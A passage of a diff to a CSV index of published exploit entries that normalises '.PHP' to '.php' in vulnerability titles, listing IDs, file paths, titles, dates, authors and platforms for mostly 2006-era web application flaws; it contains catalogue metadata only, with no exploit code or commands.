Vulnerabilities",2006-05-03,almaster,php,webapps,0 27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0 27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 dlisting.php cid Parameter XSS",2006-05-02,r0t,php,webapps,0 27811,platforms/php/webapps/27811.txt,"Albinator 2.0.8 showpic.php preloadSlideShow Parameter XSS",2006-05-02,r0t,php,webapps,0 -27812,platforms/php/webapps/27812.txt,"PHP Linkliste 1.0 Linkliste.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,d4igoro,php,webapps,0 +27812,platforms/php/webapps/27812.txt,"PHP Linkliste 1.0 Linkliste.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,d4igoro,php,webapps,0 27813,platforms/asp/webapps/27813.txt,"CyberBuild - login.asp SessionID Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 27814,platforms/asp/webapps/27814.txt,"CyberBuild - browse0.htm ProductIndex Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 27815,platforms/asp/webapps/27815.txt,"CyberBuild - login.asp SessionID Parameter XSS",2006-05-03,r0t,asp,webapps,0 27816,platforms/asp/webapps/27816.txt,"CyberBuild - browse0.htm ProductIndex Parameter XSS",2006-05-03,r0t,asp,webapps,0 27817,platforms/asp/webapps/27817.txt,"CyberBuild - result.asp Multiple Parameter XSS",2006-05-03,r0t,asp,webapps,0 -27818,platforms/php/webapps/27818.txt,"Invision Power Board 2.0/2.1 Index.PHP SQL Injection Vulnerability",2006-05-04,almaster,php,webapps,0 +27818,platforms/php/webapps/27818.txt,"Invision Power Board 2.0/2.1 Index.php SQL Injection Vulnerability",2006-05-04,almaster,php,webapps,0 27819,platforms/php/webapps/27819.txt,"CuteNews 1.4.1 - search.php Multiple Parameter XSS",2006-05-05,NST,php,webapps,0 27820,platforms/windows/remote/27820.txt,"Cryptomathic ActiveX Control Remote Buffer Overflow Vulnerability",2006-05-05,"Dennis Rand",windows,remote,0 -27821,platforms/php/webapps/27821.html,"OpenFAQ 0.4 Validate.PHP HTML Injection Vulnerability",2006-05-06,"Kamil Sienicki",php,webapps,0 +27821,platforms/php/webapps/27821.html,"OpenFAQ 0.4 Validate.php HTML Injection Vulnerability",2006-05-06,"Kamil Sienicki",php,webapps,0 27822,platforms/php/webapps/27822.txt,"MyBloggie 2.1.2/2.1.3 BBCode IMG Tag HTML Injection Vulnerability",2006-05-06,zerogue,php,webapps,0 27823,platforms/php/webapps/27823.txt,"OpenEngine 1.7/1.8 Template Unauthorized Access Vulnerability",2006-05-08,ck@caroli.info,php,webapps,0 -27824,platforms/php/webapps/27824.txt,"Singapore 0.9.7 Index.PHP Cross-Site Scripting Vulnerability",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 +27824,platforms/php/webapps/27824.txt,"Singapore 0.9.7 Index.php Cross-Site Scripting Vulnerability",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 27825,platforms/asp/webapps/27825.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 admin/main.asp date Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 27826,platforms/asp/webapps/27826.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 admin/view.asp SearchFor Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 27827,platforms/asp/webapps/27827.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 admin/edit.asp ID Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 27828,platforms/asp/webapps/27828.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 admin/main.asp date Parameter XSS",2006-05-08,dj_eyes2005,asp,webapps,0 -27829,platforms/php/webapps/27829.txt,"Phil's Bookmark Script Admin.PHP Authentication Bypass Vulnerability",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 +27829,platforms/php/webapps/27829.txt,"Phil's Bookmark Script Admin.php Authentication Bypass Vulnerability",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 27830,platforms/hardware/remote/27830.java,"Multiple Cisco Products WebSense Content Filtering Bypass Vulnerability",2006-05-08,"George D. Gal",hardware,remote,0 27831,platforms/php/webapps/27831.txt,"Creative Software UK Community Portal 1.1 ArticleView.php article_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 27832,platforms/php/webapps/27832.txt,"Creative Software UK Community Portal 1.1 DiscView.php forum_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 @@ -24934,15 +24934,15 @@ id,file,description,date,author,platform,type,port 27834,platforms/php/webapps/27834.txt,"Creative Software UK Community Portal 1.1 EventView.php event_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 27835,platforms/php/webapps/27835.txt,"Creative Software UK Community Portal 1.1 PollResults.php Multiple Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 27836,platforms/php/webapps/27836.txt,"Creative Software UK Community Portal 1.1 DiscReply.php mid Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 -27837,platforms/php/webapps/27837.txt,"EvoTopsite 2.0 Index.PHP Multiple SQL Injection Vulnerabilities",2006-05-08,"Hamid Ebadi",php,webapps,0 +27837,platforms/php/webapps/27837.txt,"EvoTopsite 2.0 Index.php Multiple SQL Injection Vulnerabilities",2006-05-08,"Hamid Ebadi",php,webapps,0 27838,platforms/php/webapps/27838.txt,"timobraun Dynamic Galerie 1.0 index.php pfad Variable Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 27839,platforms/php/webapps/27839.txt,"timobraun Dynamic Galerie 1.0 galerie.php pfad Variable Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 27840,platforms/php/webapps/27840.txt,"timobraun Dynamic Galerie 1.0 index.php pfad Parameter XSS",2006-05-08,d4igoro,php,webapps,0 27841,platforms/php/webapps/27841.txt,"timobraun Dynamic Galerie 1.0 galerie.php id Parameter XSS",2006-05-08,d4igoro,php,webapps,0 27842,platforms/asp/webapps/27842.txt,"MultiCalendars 3.0 - All_calendars.ASP SQL Injection Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0 -27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 Showthread.PHP SQL Injection Vulnerability",2006-05-09,Breeeeh,php,webapps,0 +27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 Showthread.php SQL Injection Vulnerability",2006-05-09,Breeeeh,php,webapps,0 27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 Moreinfo.ASP Cross-Site Scripting Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0 -27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 Session.INC.PHP Remote File Include Vulnerability",2006-05-09,ReZEN,php,webapps,0 +27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 Session.INC.php Remote File Include Vulnerability",2006-05-09,ReZEN,php,webapps,0 27846,platforms/asp/webapps/27846.txt,"EImagePro - - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 33405,platforms/multiple/remote/33405.txt,"APC Network Management Card Cross-Site Request Forgery and Cross-Site Scripting Vulnerabilities",2009-12-15,"Jamal Pecou",multiple,remote,0 27848,platforms/php/webapps/27848.txt,"EImagePro - view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 @@ -24954,7 +24954,7 @@ id,file,description,date,author,platform,type,port 27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 charts.php id Parameter XSS",2006-05-11,sn4k3.23,php,webapps,0 27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 Vname Parameter Cross-Site Scripting Vulnerability",2006-05-12,Kiki,php,webapps,0 -27860,platforms/php/webapps/27860.txt,"PHP Live Helper 2.0 Chat.PHP Cross-Site Scripting Vulnerability",2006-05-12,Mr-X,php,webapps,0 +27860,platforms/php/webapps/27860.txt,"PHP Live Helper 2.0 Chat.php Cross-Site Scripting Vulnerability",2006-05-12,Mr-X,php,webapps,0 27861,platforms/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/Navigation.asp sDeviceView Parameter XSS",2006-05-12,"David Maciejak",asp,remote,0 27862,platforms/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/ToolResults.asp sHostname Parameter XSS",2006-05-12,"David Maciejak",asp,remote,0 27863,platforms/php/webapps/27863.txt,"PHPBB 2.0.20 Unauthorized HTTP Proxy Vulnerability",2006-05-12,rgod,php,webapps,0 @@ -24974,16 +24974,16 @@ id,file,description,date,author,platform,type,port 27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server Remote Command Execution",2013-08-26,metasploit,windows,remote,7770 27878,platforms/hardware/webapps/27878.txt,"Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities",2013-08-26,"Craig Young",hardware,webapps,0 27879,platforms/php/webapps/27879.txt,"Joomla! VirtueMart Component 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps,0 -27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 Popup.PHP Local File Include Vulnerability",2006-05-15,Mr.CrackerZ,php,webapps,0 -27881,platforms/php/webapps/27881.txt,"PHPODP 1.5 ODP.PHP Cross-Site Scripting Vulnerability",2006-05-15,Kiki,php,webapps,0 +27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 Popup.php Local File Include Vulnerability",2006-05-15,Mr.CrackerZ,php,webapps,0 +27881,platforms/php/webapps/27881.txt,"PHPODP 1.5 ODP.php Cross-Site Scripting Vulnerability",2006-05-15,Kiki,php,webapps,0 27882,platforms/java/dos/27882.java,"Sun Java Applet Font.createFont Remote Denial of Service Vulnerability",2006-05-15,"Marc Schoenefeld",java,dos,0 27883,platforms/php/webapps/27883.txt,"MonoChat 1.0 HTML Injection Vulnerability",2005-05-15,X-BOY,php,webapps,0 -27884,platforms/php/webapps/27884.txt,"Confixx 3.0/3.1 Index.PHP Cross-Site Scripting Vulnerability",2006-05-15,LoK-Crew,php,webapps,0 -27885,platforms/php/webapps/27885.txt,"PHPRemoteView PRV.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 -27886,platforms/php/webapps/27886.txt,"Sphider 1.3 - Search.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 +27884,platforms/php/webapps/27884.txt,"Confixx 3.0/3.1 Index.php Cross-Site Scripting Vulnerability",2006-05-15,LoK-Crew,php,webapps,0 +27885,platforms/php/webapps/27885.txt,"PHPRemoteView PRV.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 +27886,platforms/php/webapps/27886.txt,"Sphider 1.3 - Search.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 27887,platforms/multiple/remote/27887.txt,"SAP Web Application Server 6.x/7.0 Input Validation Vulnerability",2005-11-09,"Arnold Grossmann",multiple,remote,0 27888,platforms/java/webapps/27888.txt,"Caucho Resin 3.0.17/3.0.18 Viewfile Information Disclosure Vulnerability",2006-05-16,"Joseph Pierini",java,webapps,0 -27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 Admin.PHP Cross-Site Scripting Vulnerability",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0 +27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 Admin.php Cross-Site Scripting Vulnerability",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0 27890,platforms/asp/webapps/27890.txt,"Open Wiki 0.78 - 'ow.asp' Cross-Site Scripting Vulnerability",2006-05-17,LiNuX_rOOt,asp,webapps,0 27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass Vulnerability",2006-05-17,"Kenneth F. Belva",hardware,remote,0 27892,platforms/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script XSS",2006-05-17,"Jaime Blasco",hardware,remote,0 @@ -24993,24 +24993,24 @@ id,file,description,date,author,platform,type,port 27896,platforms/asp/webapps/27896.txt,"ASPBB 0.5.2 default.asp action Parameter XSS",2006-05-18,TeufeL,asp,webapps,0 27897,platforms/asp/webapps/27897.txt,"ASPBB 0.5.2 profile.asp get Parameter XSS",2006-05-18,TeufeL,asp,webapps,0 27898,platforms/asp/webapps/27898.txt,"CodeAvalanche News 1.2 Default.ASP SQL Injection Vulnerability",2006-05-19,omnipresent,asp,webapps,0 -27899,platforms/php/webapps/27899.txt,"JemWeb DownloadControl 1.0 DC.PHP SQL Injection Vulnerability",2006-05-19,Luny,php,webapps,0 -27900,platforms/php/webapps/27900.txt,"Artmedic Newsletter 4.1 Log.PHP Remote Script Execution Vulnerability",2006-05-19,C.Schmitz,php,webapps,0 +27899,platforms/php/webapps/27899.txt,"JemWeb DownloadControl 1.0 DC.php SQL Injection Vulnerability",2006-05-19,Luny,php,webapps,0 +27900,platforms/php/webapps/27900.txt,"Artmedic Newsletter 4.1 Log.php Remote Script Execution Vulnerability",2006-05-19,C.Schmitz,php,webapps,0 27901,platforms/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 Nested Array Objects Denial of Service Vulnerability",2006-05-22,"Marc Schoenefeld",multiple,dos,0 27902,platforms/linux/remote/27902.txt,"Prodder 0.4 - Arbitrary Shell Command Execution Vulnerability",2006-05-22,"RedTeam Pentesting",linux,remote,0 27903,platforms/linux/dos/27903.txt,"Dia 0.8x/0.9x Filename Remote Format String Vulnerability",2006-05-23,KaDaL-X,linux,dos,0 27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x_DoceboKms 3.0.3_Docebo CMS 3.0.x - Multiple Remote File Include Vulnerabilities",2006-05-23,Kacper,php,webapps,0 27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x Lang Parameter Multiple Remote File Include Vulnerabilities",2006-05-26,beford,php,webapps,0 27906,platforms/windows/dos/27906.txt,"Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability",2006-05-26,"Thomas Waldegger",windows,dos,0 -27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 Show.PHP SQL Injection Vulnerability",2006-05-27,SwEET-DeViL,php,webapps,0 -27908,platforms/php/webapps/27908.txt,"Chipmunk 1.4 Guestbook Index.PHP Cross-Site Scripting Vulnerability",2006-05-27,black-code,php,webapps,0 -27909,platforms/php/webapps/27909.txt,"Chipmunk Directory Index.PHP Cross-Site Scripting Vulnerability",2006-05-27,black-code,php,webapps,0 +27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 Show.php SQL Injection Vulnerability",2006-05-27,SwEET-DeViL,php,webapps,0 +27908,platforms/php/webapps/27908.txt,"Chipmunk 1.4 Guestbook Index.php Cross-Site Scripting Vulnerability",2006-05-27,black-code,php,webapps,0 +27909,platforms/php/webapps/27909.txt,"Chipmunk Directory Index.php Cross-Site Scripting Vulnerability",2006-05-27,black-code,php,webapps,0 27910,platforms/php/webapps/27910.txt,"AR-Blog 5.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-27,black-code,php,webapps,0 27911,platforms/php/webapps/27911.txt,"vCard 2.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,black-code,php,webapps,0 -27912,platforms/php/webapps/27912.txt,"CoolPHP Index.PHP Cross-Site Scripting Vulnerability",2006-05-27,black-code,php,webapps,0 +27912,platforms/php/webapps/27912.txt,"CoolPHP Index.php Cross-Site Scripting Vulnerability",2006-05-27,black-code,php,webapps,0 27913,platforms/asp/webapps/27913.txt,"Mini-NUKE 2.3 Your_Account.ASP Multiple SQL Injection Vulnerabilities",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0 27914,platforms/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - Remote Pre-Authentication IMAP Buffer Overflow Vulnerability",2006-05-29,kcope,windows,dos,0 27915,platforms/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service Vulnerability",2006-05-29,y3dips,multiple,dos,0 -27916,platforms/php/webapps/27916.txt,"Photoalbum B&W 1.3 Index.PHP Cross-Site Scripting Vulnerability",2006-05-29,black-code,php,webapps,0 +27916,platforms/php/webapps/27916.txt,"Photoalbum B&W 1.3 Index.php Cross-Site Scripting Vulnerability",2006-05-29,black-code,php,webapps,0 27917,platforms/php/webapps/27917.txt,"TikiWiki 1.9 tiki-lastchanges.php Multiple Parameter XSS",2006-05-29,Blwood,php,webapps,0 27918,platforms/asp/webapps/27918.txt,"ASPBB 0.5.2 Perform_search.ASP Cross-Site Scripting Vulnerability",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0 27919,platforms/php/webapps/27919.txt,"Geeklog 1.4 - Multiple Input Validation Vulnerabilities",2006-05-11,trueend5,php,webapps,0 @@ -25018,22 +25018,22 @@ id,file,description,date,author,platform,type,port 27921,platforms/php/webapps/27921.txt,"EVA-Web 2.1.2 rubrique.php3 date Parameter XSS",2006-05-30,r0t,php,webapps,0 27922,platforms/php/webapps/27922.txt,"EVA-Web 2.1.2 index.php Multiple Parameter XSS",2006-05-30,r0t,php,webapps,0 27923,platforms/hardware/remote/27923.txt,"D-Link Airspot DSA-3100 Gateway Login_error.SHTML Cross-Site Scripting Vulnerability",2006-05-30,"Jaime Blasco",hardware,remote,0 -27924,platforms/php/webapps/27924.txt,"ToendaCMS 0.7 Index.PHP Cross-Site Scripting Vulnerability",2006-05-31,Jokubas,php,webapps,0 +27924,platforms/php/webapps/27924.txt,"ToendaCMS 0.7 Index.php Cross-Site Scripting Vulnerability",2006-05-31,Jokubas,php,webapps,0 27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service Vulnerability",2006-05-31,"Tony Griffiths",linux,dos,0 -27926,platforms/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - Index.PHP Local File Include Vulnerability",2006-05-31,darkgod,php,webapps,0 +27926,platforms/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - Index.php Local File Include Vulnerability",2006-05-31,darkgod,php,webapps,0 27927,platforms/php/webapps/27927.txt,"PHP-Nuke 7.x - Multiple Remote File Include Vulnerabilities",2005-05-31,ERNE,php,webapps,0 -27928,platforms/php/webapps/27928.txt,"OSTicket 1.x Open_form.PHP Remote File Include Vulnerability",2006-05-31,Sweet,php,webapps,0 -27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 Portal.PHP SQL Injection Vulnerability",2006-05-31,SpC-x,php,webapps,0 +27928,platforms/php/webapps/27928.txt,"OSTicket 1.x Open_form.php Remote File Include Vulnerability",2006-05-31,Sweet,php,webapps,0 +27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 Portal.php SQL Injection Vulnerability",2006-05-31,SpC-x,php,webapps,0 27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 MHTML URI Buffer Overflow Vulnerability",2006-05-31,Mr.Niega,windows,dos,0 27931,platforms/multiple/remote/27931.txt,"Snort 2.4.x URIContent Rules Detection Evasion Vulnerability",2006-05-31,"Blake Hartstein",multiple,remote,0 27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 Unauthorized Access Vulnerability",2006-05-01,omnipresent,asp,webapps,0 -27933,platforms/php/webapps/27933.txt,"Tekno.Portal Bolum.PHP SQL Injection Vulnerability",2006-06-01,SpC-x,php,webapps,0 -27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 Content.PHP SQL Injection Vulnerability",2006-06-01,SpC-x,php,webapps,0 +27933,platforms/php/webapps/27933.txt,"Tekno.Portal Bolum.php SQL Injection Vulnerability",2006-06-01,SpC-x,php,webapps,0 +27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 Content.php SQL Injection Vulnerability",2006-06-01,SpC-x,php,webapps,0 27994,platforms/php/webapps/27994.txt,"Open Business Management 1.0.3 pl1 publication_index.php tf_lang Parameter XSS",2006-06-07,r0t,php,webapps,0 27995,platforms/php/webapps/27995.txt,"Open Business Management 1.0.3 pl1 group_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 user_index.php tf_lastname Parameter XSS",2006-06-07,r0t,php,webapps,0 27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 list_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 -28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 Index.PHP Remote File Include Vulnerability",2006-08-16,O.U.T.L.A.W,php,webapps,0 +28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 Index.php Remote File Include Vulnerability",2006-08-16,O.U.T.L.A.W,php,webapps,0 27938,platforms/linux/local/27938.rb,"VMWare - Setuid vmware-mount Unsafe popen(3)",2013-08-29,metasploit,linux,local,0 27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution",2013-08-29,metasploit,windows,remote,0 27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,metasploit,windows,remote,0 @@ -25044,7 +25044,7 @@ id,file,description,date,author,platform,type,port 27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting Vulnerability",2006-06-02,The_BeKiR,asp,webapps,0 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 -27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x Redirect.PHP Local File Include Vulnerability",2006-06-02,brokejunker,php,webapps,0 +27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x Redirect.php Local File Include Vulnerability",2006-06-02,brokejunker,php,webapps,0 27949,platforms/php/webapps/27949.txt,"Ovidentia 5.6.x/5.8 - approb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27950,platforms/php/webapps/27950.txt,"Ovidentia 5.6.x/5.8 - vacadmb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27951,platforms/php/webapps/27951.txt,"Ovidentia 5.6.x/5.8 - vacadma.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 @@ -25057,18 +25057,18 @@ id,file,description,date,author,platform,type,port 27958,platforms/php/webapps/27958.txt,"DeltaScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 Viewmsg.ASP SQL Injection Vulnerability",2006-06-02,ajann,asp,webapps,0 -27961,platforms/php/webapps/27961.txt,"PHPBB 2.0.x Template.PHP Remote File Include Vulnerability",2006-06-02,Canberx,php,webapps,0 -27962,platforms/php/webapps/27962.txt,"IBWd Guestbook 1.0 Index.PHP SQL Injection Vulnerability",2006-06-03,SpC-x,php,webapps,0 -27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 Index.PHP SQL Injection Vulnerability",2006-06-03,SpC-x,php,webapps,0 -27964,platforms/php/webapps/27964.txt,"CoolForum 0.x Editpost.PHP SQL Injection Vulnerability",2006-06-05,DarkFig,php,webapps,0 +27961,platforms/php/webapps/27961.txt,"PHPBB 2.0.x Template.php Remote File Include Vulnerability",2006-06-02,Canberx,php,webapps,0 +27962,platforms/php/webapps/27962.txt,"IBWd Guestbook 1.0 Index.php SQL Injection Vulnerability",2006-06-03,SpC-x,php,webapps,0 +27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 Index.php SQL Injection Vulnerability",2006-06-03,SpC-x,php,webapps,0 +27964,platforms/php/webapps/27964.txt,"CoolForum 0.x Editpost.php SQL Injection Vulnerability",2006-06-05,DarkFig,php,webapps,0 27965,platforms/osx/local/27965.py,"OSX <= 10.8.4 - Local Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 27992,platforms/unix/remote/27992.txt,"FreeType TTF File Remote Buffer Overflow Vulnerability",2006-06-08,"Josh Bressers",unix,remote,0 27993,platforms/multiple/dos/27993.txt,"FreeType TTF File Remote Denial of Service Vulnerability",2006-06-08,"Josh Bressers",multiple,dos,0 27979,platforms/php/webapps/27979.html,"myNewsletter 1.1.2 UserName SQL Injection Vulnerability",2006-06-05,FarhadKey,php,webapps,0 -27980,platforms/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 Comments.PHP SQL Injection Vulnerability",2006-06-05,ajann,php,webapps,0 +27980,platforms/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 Comments.php SQL Injection Vulnerability",2006-06-05,ajann,php,webapps,0 27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service Vulnerability",2006-06-06,"Xavier Roche",linux,dos,0 -27982,platforms/php/webapps/27982.txt,"GANTTy 1.0.3 Index.PHP Cross-Site Scripting Vulnerability",2006-06-06,Luny,php,webapps,0 -27983,platforms/php/webapps/27983.txt,"MyBulletinBoard 1.1.2 - Private.PHP Cross-Site Scripting Vulnerability",2006-06-06,o.y.6,php,webapps,0 +27982,platforms/php/webapps/27982.txt,"GANTTy 1.0.3 Index.php Cross-Site Scripting Vulnerability",2006-06-06,Luny,php,webapps,0 +27983,platforms/php/webapps/27983.txt,"MyBulletinBoard 1.1.2 - Private.php Cross-Site Scripting Vulnerability",2006-06-06,o.y.6,php,webapps,0 27984,platforms/windows/remote/27984.txt,"Microsoft DXImageTransform.Microsoft.Light ActiveX Control Remote Code Execution Vulnerability",2006-06-13,"Will Dormann",windows,remote,0 27985,platforms/php/webapps/27985.txt,"AZ Photo Album Script Pro Cross-Site Scripting Vulnerability",2006-05-23,Luny,php,webapps,0 27986,platforms/windows/remote/27986.html,"Microsoft Internet Explorer 5.5/6.0/7.0 - JavaScript Key Filtering Vulnerability",2006-06-06,"Jesse Ruderman",windows,remote,0 @@ -25088,28 +25088,28 @@ id,file,description,date,author,platform,type,port 28008,platforms/php/webapps/28008.txt,"Adaptive Website Framework 1.11 - Remote File Include Vulnerability",2006-06-12,"Federico Fazzi",php,webapps,0 28009,platforms/php/webapps/28009.txt,"Five Star Review Script - index2.php sort Parameter XSS",2006-06-12,Luny,php,webapps,0 28010,platforms/php/webapps/28010.txt,"Five Star Review Script - report.php item_id Parameter XSS",2006-06-12,Luny,php,webapps,0 -28011,platforms/php/webapps/28011.txt,"iFoto 0.20 Index.PHP Cross-Site Scripting Vulnerability",2006-06-12,Luny,php,webapps,0 +28011,platforms/php/webapps/28011.txt,"iFoto 0.20 Index.php Cross-Site Scripting Vulnerability",2006-06-12,Luny,php,webapps,0 28012,platforms/php/webapps/28012.txt,"Foing 0.x - Remote File Include Vulnerability",2006-06-12,Darkfire,php,webapps,0 -28013,platforms/php/webapps/28013.txt,"SixCMS 6.0 List.PHP Cross-Site Scripting Vulnerability",2006-06-12,Aesthetico,php,webapps,0 -28014,platforms/php/webapps/28014.txt,"SixCMS 6.0 Detail.PHP Directory Traversal Vulnerability",2006-06-12,Aesthetico,php,webapps,0 +28013,platforms/php/webapps/28013.txt,"SixCMS 6.0 List.php Cross-Site Scripting Vulnerability",2006-06-12,Aesthetico,php,webapps,0 +28014,platforms/php/webapps/28014.txt,"SixCMS 6.0 Detail.php Directory Traversal Vulnerability",2006-06-12,Aesthetico,php,webapps,0 28015,platforms/php/webapps/28015.txt,"iFusion iFlance 1.1 - Multiple Input Validation Vulnerabilities",2006-06-12,Luny,php,webapps,0 28016,platforms/php/webapps/28016.txt,"DoubleSpeak 0.1 - Multiple Remote File Include Vulnerabilities",2006-06-13,R@1D3N,php,webapps,0 28017,platforms/php/webapps/28017.txt,"CEScripts Multiple Scripts Cross-Site Scripting Vulnerabilities",2006-06-13,Luny,php,webapps,0 28018,platforms/php/webapps/28018.txt,"VBZoom 1.0/1.1 - Multiple SQL Injection Vulnerabilities",2006-06-13,"CrAzY CrAcKeR",php,webapps,0 -28019,platforms/php/webapps/28019.txt,"Simpnews 2.x Wap_short_news.PHP Remote File Include Vulnerability",2006-06-13,SpC-x,php,webapps,0 +28019,platforms/php/webapps/28019.txt,"Simpnews 2.x Wap_short_news.php Remote File Include Vulnerability",2006-06-13,SpC-x,php,webapps,0 28020,platforms/php/webapps/28020.txt,"Andy Mack 35mm Slide Gallery 6.0 index.php imgdir Parameter XSS",2006-06-13,black-cod3,php,webapps,0 28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 popup.php Multiple Parameter XSS",2006-06-13,black-cod3,php,webapps,0 28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injection Vulnerabilities",2006-06-14,"CrAzY CrAcKeR",php,webapps,0 -28023,platforms/php/webapps/28023.txt,"Confixx 3.0/3.1 FTP_index.PHP Cross-Site Scripting Vulnerability",2006-06-14,kr4ch,php,webapps,0 -28024,platforms/php/webapps/28024.txt,"PhpBB BBRSS.PHP Remote File Include Vulnerability",2006-06-14,SpC-x,php,webapps,0 -28025,platforms/php/webapps/28025.txt,"RahnemaCo Page.PHP Remote File Include Vulnerability",2006-06-14,Breeeeh,php,webapps,0 +28023,platforms/php/webapps/28023.txt,"Confixx 